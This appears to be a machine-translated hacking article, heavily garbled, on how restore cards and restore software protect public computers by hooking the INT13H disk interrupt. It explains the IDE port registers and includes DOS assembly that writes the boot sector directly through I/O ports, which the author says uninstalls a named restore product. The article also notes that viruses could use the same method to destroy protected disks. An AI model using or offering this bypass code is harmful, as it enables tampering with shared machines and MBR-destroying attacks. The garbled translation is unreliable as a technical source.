A code that can penetrate the reduction card and restore software, a codewashing card and restore software that can penetrate the reduction card and restore software, is widely used in a variety of public applications, such as schools. Computer room and Internet cafes. These restore cards and restore software (hereinafter referred to as virtual restore technology) can record everything to write to the hard disk, whether you copy the hard drive or mobile deletion or even formatting partitions, as long as you restart, everything will be restored Before this operation, some virtual restore manufacturers will also add a "to prevent all computer viruses" in advertising words. This virtual restore method can indeed play a good protection of the computer room in public computer room. Is there a way to penetrate this protection? The answer is negative, please listen to me one by one below. I. Principles of Virtual Restore Technology This article is a technique that is commonly used in restore cards or restore software. Of course, different manufacturers have different manufacturers, but the principle is connected. First, the restore card and restore software will take the leader to capture the guiding rights, save the original 0-head 1 fan in one other sector, (specific backup to that sector is not necessarily), write your code to 0 The head is 1 fan, so that it can be executed before the operating system, which is similar to a boot-type virus; then let's take a look at what the virtual restore technology has done before the operating system: 1. Save the inlet address of the INT13H in the interrupt vector table; Write yourself instead of INT13H code to write memory, remember the entrance address, of course, this "write memory" is not ordinary "written", but a method we call "resident", related " The implementation method of the resident program, we don't have another flower arrangement. If you still don't understand, please find relevant information, or to find a fan-like man who is looking for www.hackart.org or www.lsky.net; 3 . The inlet address of INT13H in the interrupt vector table is changed to the entry address of this resident program. In addition, the virtual restore program often modifies some other interrupt portions after modifying the entrance of INT13H, of course, through the resident program, which is used to implement the INT13H entrance address monitoring in the interrupt vector table, once found modified, I will change it immediately, which is also used to prevent being cracked by people. Ok, you have seen it, this code used to replace the INT13H code is the key to virtual restoration technology. So what is the implementation of this code, the following is what I have a shallow understanding: 1 . Intercepting all INT13H 0-head 0-channel 1-handed operations These include read and write operations, transform all the operations of 0-headed 1 fifth to the sector of the virtual restore program backup, doing this It is not destroyed by protecting the virtual restore code, and cannot be cracked by someone who reads out, even if you view the main boot area with a sector editing tool, you can actually see the main boot area of this backup. 2. Blocking the hard disk operation in all INT13H This includes a write operation in the INT13H of the hard disk of 8 g or less, and the write operation in the INT13H, and the extension INT13H is based on the sector address, or even Including the write operation of the hard disk for some non-IDE interfaces in the extended INT13H. As for the key to interception, what is the key to virtual restore technology, it is entirely "nothing" in the early DOS system, that is, when the user is written, it is actually not done, but the current operating system is To make some necessary write operations for the hard disk, such as the write operation of the virtual memory. As we all know, virtual memory is actually hard drive, and if the operating system is prohibited, it is obviously unimaginable.
Therefore, most of the virtual restore manufacturers use some hard disk space to make a record of the write operation in the hard disk, and if the system restarts, restores this record, but how to record the hard drive's write, I have never If you want to pass, this "science" should reflect the amount of time and hard disk space, that is, how to use the least amount of time and the least hard disk space to record the hard disk write operation is the key, if there is Our friends are welcome to communicate with me; 3. The contents of the backup ports 70h, 71h, and compare the contents of the port 70h, 71h, 71h, and the contents of the backup of the backup, not the same prompts, whether to restore, and via the password to modify whether the BIOS is legal. Second, the interrupt mechanism interrupt of the PC provides the most basic hardware and software interface, which makes the programmer do not have to know the details of the hardware system, as long as the system is directly called, the corresponding function can be completed, so that this can make The program is more convenient. Its implementation mechanism is as follows: When a disrupt source issues an interrupt request, the CPU can decide whether to respond to this interrupt request (when the CPU is performing more important work, it can be no response), if allowed to be interrupted, the CPU will be interrupted After execution of the current instruction, the state of the next instruction address and the contents of each register and the status of the registers are put into the stack, and then go to the entrance to the interrupt source service program, interrupt processing, when interrupt After the processing is completed, restore the reserved registers, flag bit status, and instruction pointers to return the CPU to the breakpoint and continue the next instruction. In order to distinguish all interrupts, the CPC system assigns an interrupt number N to each interrupt, such as INT 3H is a breakpoint interrupt, INT 10h is an interrupt, and we have to discuss today is the main INT 13H disk read and write interrupt. To say clearly, the interrupt mechanism on the PC is completely insufficient. Here I am talking about it. If you don't know, please check some information or communicate with me, what we are important today is INT13H Take a picture to see what BIOS is available to us. What is it doing? The so-called BIOS interrupt is simple to say is the interrupt provided by the BIOS on your machine, then what is it behind the BIOS? In fact, some of the input and output operations for ports, each port of the PC implements a specific function, we can do without calling the BIOS provided by the BIOS, and use the input / output command to operate these ports, so that you can implement image call BIOS interrupt The same function, but a premise is that you must have a detailed understanding of these ports. Conversely, a great advantage of the PC's interrupt system is to allow programmers to be able to program, from this point of view, interruption is a bit like "packaging" we usually say, I don't know like this. Saying right, but it is indeed an interrupted details of the underlying system of the system.
Third, the constant meaning of the hard disk read and write port is the common port for the hard disk. The common port of the hard disk is 1F0H ~ 1F7H port, the ports mean the following: port number reading or write specific meaning 1F0H read / write to transfer read / write data (its content Is a byte of a byte that is being transmitted) 1f1h read to read the wrong error 1F2H read / write to place the sector of the sector to read and write 1F3H read / write to place the sector number 1F4H to read and write 1F4H / Write to store the low 8-bit byte of the read-write cylinder 1f5h read / write to store the high 2-bit bytes of readout cylinders (height 6-position constant 0) 1F6H read / write to store to read / Write disk number and head number 7th position constant to 1 of the 6th position is 0 5th position constant 1 4th bit is 0 represents the first block, which represents the second hard disk No. 3 ~ 0 To store the magnetic head number to read / write 1f7h read to store the status of the read operation 7th controller busy sixth-bit disk drive ready for the 5th write error 4th Search Complete the third bit of 1 The sector buffer is not ready for the second bit correctly read the disk data. The first-digit disk sets this bit to 1, and the 0-bit command ends the bit port for the command port due to an error. To issue a specified command for a 50h format track to 20h attempt to read the sector for 21h No need to verify that the sector is ready to read the sector 22h attempt to read the long sector (for the early hard drive, each fan may not be 512) Bytes, but the value between 128 bytes to 1024) is 23h does not have to verify that the sector is ready to read the long sector 30h attempt to write the sector for 31h without verifying whether the sector is ready and direct writer Attempting to write the long sector for 33h does not have to verify that the sector is ready to write long sectors: Of course, you will find that this table will find that this method of reading and writing is actually based on the head, cylindrical, sector. The hard disk read / write method, but the read and write method of the hard disk greater than 8G is also implemented through the port 1f0h ~ 1f7h. A instance of reading and writing hard drives by inputting output port operations by the hard disk, let us look at INT13H read and write hard disk Program instance. In the example, the port used in the read / write operation of the hard disk is described in detail, and the data obtained by the main boot area read from INT13H and the data obtained by the input and output read main boot regions are compared to confirm the two operation functions. Similarly, the program fragment is as follows: MOV DX, 1F6H; disk number and magnetic head number MOV Al, 0A0H, magnetic head 0 OUT DX, Al MoV DX, 1F2H; the number of sectors to be read) MOV Al, 1 Read a sector OUT DX, Al Mov DX, 1F3H; the sector number MOV Al, 1 to read; the sector number is 1 OUT DX, Al Mov DX, 1F4H; the cylinder to read 8-bit MOV Al, 0 The cylinder is low of 8 bits of 0 OUT DX, Al MoV DX, 1F5H; cylindrical high 2-bit MOV Al, 0; cylindrical high 2 bits (we can determine through 1F4H and 1F5H port; No. 0) OUT DX, Al MoV DX, 1F7H; Command Port MOV Al, 20H; Try Read Seafront Out DX, Al STILL_GOING: IN AL, DX TEST AL, 8; Sector Buffer Prepare JZ STILL_GOING; if If the sector buffer is not ready, jump until it is ready.
MOV CX, 512/2; Set the number of cycles (512/2) MOV DI, OFFSET BUFFER MOV DX, 1F0H; the data of one byte to be transmitted; transfer data; ------ Mov AX, 201h The following is the 0 head, 0 cylinder, 1 sector MOV DX, 80H MOV CX, 1 MOV DX, OFFSET BUFFER2 INT 13H MOV DX, 512; the following sections are used to compare the hard disk read by the two methods. data mov si, offset buffer mov di, offset buffer2 repe cmpsb jne failure mov ah, 9 mov dx, offset readmsg int 21h jmp good_exit failure: mov ah, 9 mov dx, offset failmsg int 21h good_exit:; the following section is used to end the program MOV AX, 4C00H; Exit Program INT 21h Readmsg DB 'The Buffers Match. Hard Disk Read Using Ports. $' Failmsg DB 'The Buffers Do Not Match. $' Buffer DB 512 DUP ('V') Buffer2 DB 512 DUP (' L ') V. You can penetrate the restore card or the codes of reducing software protection. You can read the port meanings of the hard disk, and then look at the above examples, you will have a relatively understanding of the hard disk read port. Ok, when I arrived at the answer, I returned to our theme. As you think now, this code that can penetrate the restore card or the reduced software protection is indeed the input and output of the hard disk read port. Now, we can already understand it from principle, the restore card interception is an interrupt operation, but can't intercept the input output operation, and use the input output operation to write to the hard disk, of course, you can read it with the input and output operation. To the critical portion of the virtual restore program shield, 0 heads of the restore card or the reduced software shielded. After knowing this principle, it may be that the benevolent sees the benevolence, if you are a virtual restore technology crack, a viral manufacturer, or designer of virtual restore technology, often understanding this understanding of. Here, I emphasized that I didn't agree to make a virus, but a virus manufacturer can use this principle to write a machine that can achieve the destruction of the restore card or restore software, so I want to remind the virtual restore user, don't think it is The restore card or the restore software will drop lightly. To know the protection of the virus in the world to penetrate the virtual restoration technology, to achieve the purpose of destroying the hard disk, imagine if this principle is applied to CIH virus, or use to hard disk killer In the virus, the consequences are unbearable. Talk about how to use this code that can penetrate the virtual restore technology to crack the restore software (such as the restored elf). The following is the code I wrote to test the cracking of the elves. The code compiled by this code needs to be executed in the pure DOS environment. I use this code to successfully uninstall this code.
.286 Code Segment Assume CS: Code, DS: Code, Es: Code Start:; -------------------------------------------------------------------------------------------------------- ---------------------------; The following code uses the INT13H read main guidance area MOV AX, 0201H MOV DX, 0080H MOV CX, 0001H MOV BX 7C00H INT 13H; ------------------------------------------------------------------------------------------------------- ------------ The following code uses the I / O port to write the main guidance area MOV DX, 1F6H; the disk number and the magnetic head number MOV Al, 0A0H; disk 0, magnetic head 0 OUT DX, Al MoV DX, 1F2H; the number of sectors to be written MOV Al, 1; write a sector OUT DX, Al Mov DX, 1F3H; the sector number MOV Al, 1; write to 1 sector OUT DX, Al MoV DX, 1F4H; 0. The low 8-bit MOV Al, 0; low 8 bits are 0 OUT DX, Al MoV DX, 1F5H; high 2-bit MOV Al, 0; high 2 The bit dx, Al Mov DX, 1F7H; command port MOV Al, 30H; try to write the sector. OUT DX, Al Oogle: IN AL, DX TEST AL, 8; disk sector buffer is ready JZ OOGLE MOV CX, 512/2; Set the number of cycles (512/2) MOV SI, 7C00H MOV DX, 1F0H; Data ports, used to store data to be sent. Rep Outsw; send data.; --------- -------------------------------------------------- -------------------; Exit Machine MOV AH, 4CH INT 21 CODE Ends End Start is very simple, described below: 1, first put down the removed wizard The original main guidance area is read with INT13H. Although it is a sector that is written to 0 heads of 0 1 fan, it is actually reading the sector backup from the original main guidance area; 2, read out The original main guidance zone is written into the true main guidance area by inputting output operations. In other words, the restored wizard is completely deleted. At this time, you will find that you will find that the restore wizard has not been. I wrote a program for uninstalling forWin98 / NT / XP, and everyone can download www.lsky.net, but someone has first step, that is, a clear MBR program of the Internet cafes, I I tried it, I found it, I haven't analyzed the procedure carefully, but I dare to affirm its principle. That program is well written, but I think there is something to improve. My hard disk MBR program is written by I have, used to implement multiple boot operations, when I execute the MBR program, my multi-boot code is not If I think this program can change the core code part into the code like me. Under the restoration of the Elf, the MBR before the reduction of the wizard returned to the main guidance area, even if the hard disk that did not load the elves was just the main The guidance area is written back to the main guidance area, there is no danger. It is possible to achieve the crack of the restore card with the above method, because the restore card is hardware after all, it can execute before the hard disk is booted, so that even if you write back the hard drive's main guidance area, the restore card can still write it Back, however, when cracking the restore card, you can use the principle in the article, write the restore card to the true code reading of the hard disk main boot area, and even some restore cards passwords in this sector. For the manufacturer of restore cards and restore software, how to make your own restore card or restore software safer, it may be a problem that needs to be thought.
